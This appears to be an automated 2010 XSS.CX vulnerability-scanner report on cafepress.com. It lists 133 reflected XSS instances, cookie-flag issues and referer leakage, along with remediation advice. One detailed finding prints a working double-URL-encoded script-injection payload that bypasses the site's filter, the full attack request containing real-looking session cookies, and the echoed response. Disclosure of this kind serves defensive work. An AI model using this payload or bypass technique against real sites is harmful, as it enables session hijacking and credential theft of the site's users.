cafepress.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86 Cross Site Scripting in cafepress.com | Vulnerability Crawler Report Report generated by XSS.CX at Mon Dec 27 10:38:41 CST 2010.
Contents2>
1. Cross-site scripting (reflected)
Contents Loading
1.1. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [REST URL parameter 1]
1.2. http://www.cafepress.com/ [cp-v cookie]
1.3. http://www.cafepress.com/ [cp_st cookie]
1.4. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp-v cookie]
1.5. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp_st cookie]
1.6. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp-v cookie]
1.7. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp_st cookie]
1.8. http://www.cafepress.com/+aprons [cp-v cookie]
1.9. http://www.cafepress.com/+aprons [cp_st cookie]
1.10. http://www.cafepress.com/+baby-blanket [cp-v cookie]
1.11. http://www.cafepress.com/+baby-blanket [cp_st cookie]
1.12. http://www.cafepress.com/+baby-bodysuits [cp-v cookie]
1.13. http://www.cafepress.com/+baby-bodysuits [cp_st cookie]
1.14. http://www.cafepress.com/+baby-hat [cp-v cookie]
1.15. http://www.cafepress.com/+baby-hat [cp_st cookie]
1.16. http://www.cafepress.com/+bags [cp-v cookie]
1.17. http://www.cafepress.com/+bags [cp_st cookie]
1.18. http://www.cafepress.com/+boxers [cp-v cookie]
1.19. http://www.cafepress.com/+boxers [cp_st cookie]
1.20. http://www.cafepress.com/+bumper-stickers [cp-v cookie]
1.21. http://www.cafepress.com/+bumper-stickers [cp_st cookie]
1.22. http://www.cafepress.com/+buttons [cp-v cookie]
1.23. http://www.cafepress.com/+buttons [cp_st cookie]
1.24. http://www.cafepress.com/+calendars [cp-v cookie]
1.25. http://www.cafepress.com/+calendars [cp_st cookie]
1.26. http://www.cafepress.com/+clocks [cp-v cookie]
1.27. http://www.cafepress.com/+clocks [cp_st cookie]
1.28. http://www.cafepress.com/+coasters [cp-v cookie]
1.29. http://www.cafepress.com/+coasters [cp_st cookie]
1.30. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp-v cookie]
1.31. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp_st cookie]
1.32. http://www.cafepress.com/+framed-prints [cp-v cookie]
1.33. http://www.cafepress.com/+framed-prints [cp_st cookie]
1.34. http://www.cafepress.com/+greeting_cards [cp-v cookie]
1.35. http://www.cafepress.com/+greeting_cards [cp_st cookie]
1.36. http://www.cafepress.com/+hats-caps [cp-v cookie]
1.37. http://www.cafepress.com/+hats-caps [cp_st cookie]
1.38. http://www.cafepress.com/+ipad-cases [cp-v cookie]
1.39. http://www.cafepress.com/+ipad-cases [cp_st cookie]
1.40. http://www.cafepress.com/+iphone-cases [cp-v cookie]
1.41. http://www.cafepress.com/+iphone-cases [cp_st cookie]
1.42. http://www.cafepress.com/+journals [cp-v cookie]
1.43. http://www.cafepress.com/+journals [cp_st cookie]
1.44. http://www.cafepress.com/+keepsake_boxes [cp-v cookie]
1.45. http://www.cafepress.com/+keepsake_boxes [cp_st cookie]
1.46. http://www.cafepress.com/+license_plate_frames [cp-v cookie]
1.47. http://www.cafepress.com/+license_plate_frames [cp_st cookie]
1.48. http://www.cafepress.com/+magnets [cp-v cookie]
1.49. http://www.cafepress.com/+magnets [cp_st cookie]
1.50. http://www.cafepress.com/+mousepads [cp-v cookie]
1.51. http://www.cafepress.com/+mousepads [cp_st cookie]
1.52. http://www.cafepress.com/+mugs [cp-v cookie]
1.53. http://www.cafepress.com/+mugs [cp_st cookie]
1.54. http://www.cafepress.com/+ornaments [cp-v cookie]
1.55. http://www.cafepress.com/+ornaments [cp_st cookie]
1.56. http://www.cafepress.com/+posters [cp-v cookie]
1.57. http://www.cafepress.com/+posters [cp_st cookie]
1.58. http://www.cafepress.com/+stadium-blanket [cp-v cookie]
1.59. http://www.cafepress.com/+stadium-blanket [cp_st cookie]
1.60. http://www.cafepress.com/+steins [cp-v cookie]
1.61. http://www.cafepress.com/+steins [cp_st cookie]
1.62. http://www.cafepress.com/+stocking [cp-v cookie]
1.63. http://www.cafepress.com/+stocking [cp_st cookie]
1.64. http://www.cafepress.com/+sweatshirts-hoodies [cp-v cookie]
1.65. http://www.cafepress.com/+sweatshirts-hoodies [cp_st cookie]
1.66. http://www.cafepress.com/+thermos [cp-v cookie]
1.67. http://www.cafepress.com/+thermos [cp_st cookie]
1.68. http://www.cafepress.com/+underwear-panties [cp-v cookie]
1.69. http://www.cafepress.com/+underwear-panties [cp_st cookie]
1.70. http://www.cafepress.com/+water-bottles [cp-v cookie]
1.71. http://www.cafepress.com/+water-bottles [cp_st cookie]
1.72. http://www.cafepress.com/+womens-tank-tops [cp-v cookie]
1.73. http://www.cafepress.com/+womens-tank-tops [cp_st cookie]
1.74. http://www.cafepress.com/+womens-thongs [cp-v cookie]
1.75. http://www.cafepress.com/+womens-thongs [cp_st cookie]
1.76. http://www.cafepress.com/+yoga-mats [cp-v cookie]
1.77. http://www.cafepress.com/+yoga-mats [cp_st cookie]
1.78. http://www.cafepress.com/TheGamingApe [cp-v cookie]
1.79. http://www.cafepress.com/TheGamingApe [cp_st cookie]
1.80. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp-v cookie]
1.81. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp_st cookie]
1.82. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp-v cookie]
1.83. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp_st cookie]
1.84. http://www.cafepress.com/cp/info/about/ [cp-v cookie]
1.85. http://www.cafepress.com/cp/info/about/ [cp_st cookie]
1.86. http://www.cafepress.com/cp/info/help/index.aspx [cp-v cookie]
1.87. http://www.cafepress.com/cp/info/help/index.aspx [cp_st cookie]
1.88. http://www.cafepress.com/cp/info/help/tos.aspx [cp-v cookie]
1.89. http://www.cafepress.com/cp/info/help/tos.aspx [cp_st cookie]
1.90. http://www.cafepress.com/cp/info/sell/index.aspx [cp-v cookie]
1.91. http://www.cafepress.com/cp/info/sell/index.aspx [cp_st cookie]
1.92. http://www.cafepress.com/cp/sitemap/ [cp-v cookie]
1.93. http://www.cafepress.com/cp/sitemap/ [cp_st cookie]
1.94. http://www.cafepress.com/cp/viewcart.aspx [cp-v cookie]
1.95. http://www.cafepress.com/cp/viewcart.aspx [cp_st cookie]
1.96. http://www.cafepress.com/make/birth-announcements [cp-v cookie]
1.97. http://www.cafepress.com/make/birth-announcements [cp_st cookie]
1.98. http://www.cafepress.com/make/custom-baby-gear [cp-v cookie]
1.99. http://www.cafepress.com/make/custom-baby-gear [cp_st cookie]
1.100. http://www.cafepress.com/make/custom-buttons [cp-v cookie]
1.101. http://www.cafepress.com/make/custom-buttons [cp_st cookie]
1.102. http://www.cafepress.com/make/custom-hats [cp-v cookie]
1.103. http://www.cafepress.com/make/custom-hats [cp_st cookie]
1.104. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp-v cookie]
1.105. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp_st cookie]
1.106. http://www.cafepress.com/make/custom-ipad-case [cp-v cookie]
1.107. http://www.cafepress.com/make/custom-ipad-case [cp_st cookie]
1.108. http://www.cafepress.com/make/custom-iphone-cases [cp-v cookie]
1.109. http://www.cafepress.com/make/custom-iphone-cases [cp_st cookie]
1.110. http://www.cafepress.com/make/custom-mugs [cp-v cookie]
1.111. http://www.cafepress.com/make/custom-mugs [cp_st cookie]
1.112. http://www.cafepress.com/make/custom-stickers [cp-v cookie]
1.113. http://www.cafepress.com/make/custom-stickers [cp_st cookie]
1.114. http://www.cafepress.com/make/custom-stockings [cp-v cookie]
1.115. http://www.cafepress.com/make/custom-stockings [cp_st cookie]
1.116. http://www.cafepress.com/make/custom-t-shirts [cp-v cookie]
1.117. http://www.cafepress.com/make/custom-t-shirts [cp_st cookie]
1.118. http://www.cafepress.com/make/custom-thermos [cp-v cookie]
1.119. http://www.cafepress.com/make/custom-thermos [cp_st cookie]
1.120. http://www.cafepress.com/make/custom-water-bottles [cp-v cookie]
1.121. http://www.cafepress.com/make/custom-water-bottles [cp_st cookie]
1.122. http://www.cafepress.com/make/holiday-invitations [cp-v cookie]
1.123. http://www.cafepress.com/make/holiday-invitations [cp_st cookie]
1.124. http://www.cafepress.com/make/holiday-photo-cards [cp-v cookie]
1.125. http://www.cafepress.com/make/holiday-photo-cards [cp_st cookie]
1.126. http://www.cafepress.com/make/personalized-gifts [cp-v cookie]
1.127. http://www.cafepress.com/make/personalized-gifts [cp_st cookie]
1.128. http://www.cafepress.com/make/personalized-ornaments [cp-v cookie]
1.129. http://www.cafepress.com/make/personalized-ornaments [cp_st cookie]
1.130. http://www.cafepress.com/make/photo-on-canvas [cp-v cookie]
1.131. http://www.cafepress.com/make/photo-on-canvas [cp_st cookie]
1.132. http://www.cafepress.com/sk/TheGamingApe [cp-v cookie]
1.133. http://www.cafepress.com/sk/TheGamingApe [cp_st cookie]
2. Cookie scoped to parent domain
2.1. http://www.cafepress.com/
2.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
2.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
2.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
2.5. http://www.cafepress.com/+aprons
2.6. http://www.cafepress.com/+baby-blanket
2.7. http://www.cafepress.com/+baby-bodysuits
2.8. http://www.cafepress.com/+baby-hat
2.9. http://www.cafepress.com/+bags
2.10. http://www.cafepress.com/+boxers
2.11. http://www.cafepress.com/+bumper-stickers
2.12. http://www.cafepress.com/+buttons
2.13. http://www.cafepress.com/+calendars
2.14. http://www.cafepress.com/+clocks
2.15. http://www.cafepress.com/+coasters
2.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
2.17. http://www.cafepress.com/+framed-prints
2.18. http://www.cafepress.com/+greeting_cards
2.19. http://www.cafepress.com/+hats-caps
2.20. http://www.cafepress.com/+ipad-cases
2.21. http://www.cafepress.com/+iphone-cases
2.22. http://www.cafepress.com/+journals
2.23. http://www.cafepress.com/+keepsake_boxes
2.24. http://www.cafepress.com/+license_plate_frames
2.25. http://www.cafepress.com/+magnets
2.26. http://www.cafepress.com/+mousepads
2.27. http://www.cafepress.com/+mugs
2.28. http://www.cafepress.com/+ornaments
2.29. http://www.cafepress.com/+posters
2.30. http://www.cafepress.com/+stadium-blanket
2.31. http://www.cafepress.com/+steins
2.32. http://www.cafepress.com/+stocking
2.33. http://www.cafepress.com/+sweatshirts-hoodies
2.34. http://www.cafepress.com/+thermos
2.35. http://www.cafepress.com/+underwear-panties
2.36. http://www.cafepress.com/+water-bottles
2.37. http://www.cafepress.com/+womens-tank-tops
2.38. http://www.cafepress.com/+womens-thongs
2.39. http://www.cafepress.com/+yoga-mats
2.40. http://www.cafepress.com/TheGamingApe
2.41. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx
2.42. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx
2.43. http://www.cafepress.com/cp/info/about/
2.44. http://www.cafepress.com/cp/info/help/
2.45. http://www.cafepress.com/cp/info/help/index.aspx
2.46. http://www.cafepress.com/cp/info/sell/index.aspx
2.47. http://www.cafepress.com/cp/moredetails.aspx
2.48. http://www.cafepress.com/cp/products/
2.49. http://www.cafepress.com/cp/sitemap/
2.50. http://www.cafepress.com/cp/tags/
2.51. http://www.cafepress.com/cp/viewcart.aspx
2.52. http://www.cafepress.com/make/birth-announcements
2.53. http://www.cafepress.com/make/custom-baby-gear
2.54. http://www.cafepress.com/make/custom-buttons
2.55. http://www.cafepress.com/make/custom-hats
2.56. http://www.cafepress.com/make/custom-hoodies-sweatshirts
2.57. http://www.cafepress.com/make/custom-ipad-case
2.58. http://www.cafepress.com/make/custom-iphone-cases
2.59. http://www.cafepress.com/make/custom-mugs
2.60. http://www.cafepress.com/make/custom-stickers
2.61. http://www.cafepress.com/make/custom-stockings
2.62. http://www.cafepress.com/make/custom-t-shirts
2.63. http://www.cafepress.com/make/custom-thermos
2.64. http://www.cafepress.com/make/custom-water-bottles
2.65. http://www.cafepress.com/make/holiday-invitations
2.66. http://www.cafepress.com/make/holiday-photo-cards
2.67. http://www.cafepress.com/make/makeacard.aspx
2.68. http://www.cafepress.com/make/personalized-gifts
2.69. http://www.cafepress.com/make/personalized-ornaments
2.70. http://www.cafepress.com/sk/TheGamingApe
3. Cookie without HttpOnly flag set
3.1. http://www.cafepress.com/
3.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
3.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
3.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
3.5. http://www.cafepress.com/+aprons
3.6. http://www.cafepress.com/+baby-blanket
3.7. http://www.cafepress.com/+baby-bodysuits
3.8. http://www.cafepress.com/+baby-hat
3.9. http://www.cafepress.com/+bags
3.10. http://www.cafepress.com/+boxers
3.11. http://www.cafepress.com/+bumper-stickers
3.12. http://www.cafepress.com/+buttons
3.13. http://www.cafepress.com/+calendars
3.14. http://www.cafepress.com/+clocks
3.15. http://www.cafepress.com/+coasters
3.16. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
3.17. http://www.cafepress.com/+framed-prints
3.18. http://www.cafepress.com/+greeting_cards
3.19. http://www.cafepress.com/+hats-caps
3.20. http://www.cafepress.com/+ipad-cases
3.21. http://www.cafepress.com/+iphone-cases
3.22. http://www.cafepress.com/+journals
3.23. http://www.cafepress.com/+keepsake_boxes
3.24. http://www.cafepress.com/+license_plate_frames
3.25. http://www.cafepress.com/+magnets
3.26. http://www.cafepress.com/+mousepads
3.27. http://www.cafepress.com/+mugs
3.28. http://www.cafepress.com/+ornaments
3.29. http://www.cafepress.com/+posters
3.30. http://www.cafepress.com/+stadium-blanket
3.31. http://www.cafepress.com/+steins
3.32. http://www.cafepress.com/+stocking
3.33. http://www.cafepress.com/+sweatshirts-hoodies
3.34. http://www.cafepress.com/+thermos
3.35. http://www.cafepress.com/+underwear-panties
3.36. http://www.cafepress.com/+water-bottles
3.37. http://www.cafepress.com/+womens-tank-tops
3.38. http://www.cafepress.com/+womens-thongs
3.39. http://www.cafepress.com/+yoga-mats
3.40. http://www.cafepress.com/1/1/index1.html
3.41. http://www.cafepress.com/1/1/indexd1.html
3.42. http://www.cafepress.com/1/3/index1.html
3.43. http://www.cafepress.com/1/3/indexb1.html
3.44. http://www.cafepress.com/1/3/indexc1.html
3.45. http://www.cafepress.com/TheGamingApe
3.46. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx
3.47. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx
3.48. http://www.cafepress.com/cp/info/about/
3.49. http://www.cafepress.com/cp/info/help/
3.50. http://www.cafepress.com/cp/info/help/index.aspx
3.51. http://www.cafepress.com/cp/info/sell/index.aspx
3.52. http://www.cafepress.com/cp/moredetails.aspx
3.53. http://www.cafepress.com/cp/products/
3.54. http://www.cafepress.com/cp/sitemap/
3.55. http://www.cafepress.com/cp/tags/
3.56. http://www.cafepress.com/cp/viewcart.aspx
3.57. http://www.cafepress.com/make/birth-announcements
3.58. http://www.cafepress.com/make/custom-baby-gear
3.59. http://www.cafepress.com/make/custom-buttons
3.60. http://www.cafepress.com/make/custom-hats
3.61. http://www.cafepress.com/make/custom-hoodies-sweatshirts
3.62. http://www.cafepress.com/make/custom-ipad-case
3.63. http://www.cafepress.com/make/custom-iphone-cases
3.64. http://www.cafepress.com/make/custom-mugs
3.65. http://www.cafepress.com/make/custom-stickers
3.66. http://www.cafepress.com/make/custom-stockings
3.67. http://www.cafepress.com/make/custom-t-shirts
3.68. http://www.cafepress.com/make/custom-thermos
3.69. http://www.cafepress.com/make/custom-water-bottles
3.70. http://www.cafepress.com/make/holiday-invitations
3.71. http://www.cafepress.com/make/holiday-photo-cards
3.72. http://www.cafepress.com/make/makeacard.aspx
3.73. http://www.cafepress.com/make/personalized-gifts
3.74. http://www.cafepress.com/make/personalized-ornaments
3.75. http://www.cafepress.com/sk/TheGamingApe
3.76. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
4. Cross-domain Referer leakage
4.1. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
4.2. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
4.3. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
4.4. http://www.cafepress.com/cp/info/help/index.aspx
4.5. http://www.cafepress.com/cp/info/sell/index.aspx
4.6. http://www.cafepress.com/cp/moredetails.aspx
4.7. http://www.cafepress.com/cp/viewcart.aspx
5. Cross-domain script include
5.1. http://www.cafepress.com/
5.2. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
5.3. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
5.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
5.5. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
5.6. http://www.cafepress.com/+aprons
5.7. http://www.cafepress.com/+baby-blanket
5.8. http://www.cafepress.com/+baby-bodysuits
5.9. http://www.cafepress.com/+baby-hat
5.10. http://www.cafepress.com/+bags
5.11. http://www.cafepress.com/+boxers
5.12. http://www.cafepress.com/+bumper-stickers
5.13. http://www.cafepress.com/+buttons
5.14. http://www.cafepress.com/+calendars
5.15. http://www.cafepress.com/+clocks
5.16. http://www.cafepress.com/+coasters
5.17. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
5.18. http://www.cafepress.com/+framed-prints
5.19. http://www.cafepress.com/+greeting_cards
5.20. http://www.cafepress.com/+hats-caps
5.21. http://www.cafepress.com/+ipad-cases
5.22. http://www.cafepress.com/+iphone-cases
5.23. http://www.cafepress.com/+journals
5.24. http://www.cafepress.com/+keepsake_boxes
5.25. http://www.cafepress.com/+license_plate_frames
5.26. http://www.cafepress.com/+magnets
5.27. http://www.cafepress.com/+mousepads
5.28. http://www.cafepress.com/+mugs
5.29. http://www.cafepress.com/+ornaments
5.30. http://www.cafepress.com/+posters
5.31. http://www.cafepress.com/+stadium-blanket
5.32. http://www.cafepress.com/+steins
5.33. http://www.cafepress.com/+stocking
5.34. http://www.cafepress.com/+sweatshirts-hoodies
5.35. http://www.cafepress.com/+thermos
5.36. http://www.cafepress.com/+underwear-panties
5.37. http://www.cafepress.com/+water-bottles
5.38. http://www.cafepress.com/+womens-tank-tops
5.39. http://www.cafepress.com/+womens-thongs
5.40. http://www.cafepress.com/+yoga-mats
5.41. http://www.cafepress.com/1/1/index1.html
5.42. http://www.cafepress.com/1/1/indexd1.html
5.43. http://www.cafepress.com/1/3/index1.html
5.44. http://www.cafepress.com/1/3/indexb1.html
5.45. http://www.cafepress.com/1/3/indexc1.html
5.46. http://www.cafepress.com/cp/info/about/
5.47. http://www.cafepress.com/cp/info/help/index.aspx
5.48. http://www.cafepress.com/cp/info/sell/index.aspx
5.49. http://www.cafepress.com/cp/moredetails.aspx
5.50. http://www.cafepress.com/cp/sitemap/
5.51. http://www.cafepress.com/cp/viewcart.aspx
5.52. http://www.cafepress.com/cp/viewcart.aspx
5.53. http://www.cafepress.com/make/birth-announcements
5.54. http://www.cafepress.com/make/custom-baby-gear
5.55. http://www.cafepress.com/make/custom-buttons
5.56. http://www.cafepress.com/make/custom-hats
5.57. http://www.cafepress.com/make/custom-hoodies-sweatshirts
5.58. http://www.cafepress.com/make/custom-ipad-case
5.59. http://www.cafepress.com/make/custom-iphone-cases
5.60. http://www.cafepress.com/make/custom-mugs
5.61. http://www.cafepress.com/make/custom-stickers
5.62. http://www.cafepress.com/make/custom-stockings
5.63. http://www.cafepress.com/make/custom-t-shirts
5.64. http://www.cafepress.com/make/custom-thermos
5.65. http://www.cafepress.com/make/custom-water-bottles
5.66. http://www.cafepress.com/make/holiday-invitations
5.67. http://www.cafepress.com/make/holiday-photo-cards
5.68. http://www.cafepress.com/make/personalized-gifts
5.69. http://www.cafepress.com/make/personalized-ornaments
5.70. http://www.cafepress.com/sk/TheGamingApe
6. Email addresses disclosed
6.1. http://www.cafepress.com/TheGamingApe
6.2. http://www.cafepress.com/make/custom-baby-gear
6.3. http://www.cafepress.com/make/custom-buttons
6.4. http://www.cafepress.com/make/custom-ipad-case
6.5. http://www.cafepress.com/make/custom-iphone-cases
6.6. http://www.cafepress.com/make/custom-stickers
6.7. http://www.cafepress.com/make/custom-stockings
6.8. http://www.cafepress.com/make/custom-thermos
6.9. http://www.cafepress.com/make/custom-water-bottles
6.10. http://www.cafepress.com/make/personalized-gifts
6.11. http://www.cafepress.com/make/personalized-ornaments
7. HTML does not specify charset
8. Content type incorrectly stated
1. Cross-site scripting (reflected)
next
There are 133 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [REST URL parameter 1]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ebb4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6f6b5b741 was submitted in the REST URL parameter 1. This input was echoed as 2ebb4</script><script>alert(1)</script>df6f6b5b741 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,2990075362ebb4%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6f6b5b741 ?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 ntCoent-Length: 43454 Date: Sun, 26 Dec 2010 13:47:13 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054713%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:47:13 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054713%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:47:13 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:47:13 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 43454 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... afepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/error404.aspx?404;http://www.cafepress.com:80/+Eat+Sleep+Game+Light+T-Shirt,2990075362ebb4</script><script>alert(1)</script>df6f6b5b741 ' window.cafepress.tealeaf.searchTerm = '' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' 